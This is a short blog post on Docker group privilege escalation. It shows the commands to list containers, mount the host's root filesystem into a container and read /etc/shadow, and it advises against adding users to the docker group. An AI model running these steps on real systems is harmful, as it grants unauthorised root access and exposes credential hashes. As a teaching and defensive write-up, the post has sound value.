Docker group privesc

Published:

I don’t think Docker needs an introduction at this point, but in case you are unfamiliar with it; it is a way of isolating software packages by virtualizing them on an OS-level which runs in “containers.” It works in a similar way to traditional virtual machines, but with much less overhead as the kernel is shared between multiple containers.

The problem arises when the docker group is assigned to the host user. Since docker is running as root with SGID, an unauthorized person who has access to the host user (with user privileges) can easily escalate privileges by mounting the host volume to one of the containers; granting the attacker full access to the filesystem.

First, make sure the host user is part of the docker group:

alice@jada:~$ groups
alice cdrom floppy audio dip video plugdev netdev bluetooth docker

Run docker container ps to get a quick list of the containers:

alice@jada:~$ docker container ps
CONTAINER ID        IMAGE               COMMAND                   NAMES
f00ba96171c5        container1          "docker-php-entrypoi…"    container1
ce2ecb56a96e        container2          "/etc/bind/entrypoin…"    container2
620b296204a3        container3          "/usr/sbin/sshd -D"       container3

From here you can spawn a tty for each container:

alice@jada:~$ docker run -ti container1 bash
root@f00ba96171c5:/#

Even better, you can specify -v to mount the entire filesystem of the host to one of the containers before accessing it. It doesn’t matter which one.

alice@jada:~$ docker run -v /:/mnt/pwned -ti container2
root@ce2ecb56a96e:/# cat /mnt/pwned/etc/shadow

You now have full access to the host volume, and from here it’s just a matter of grabbing keys, hashes, and whatnot to get a shell.

Takeaways

Don’t assign users to docker groups.

See also: Running a Docker container as a non-root user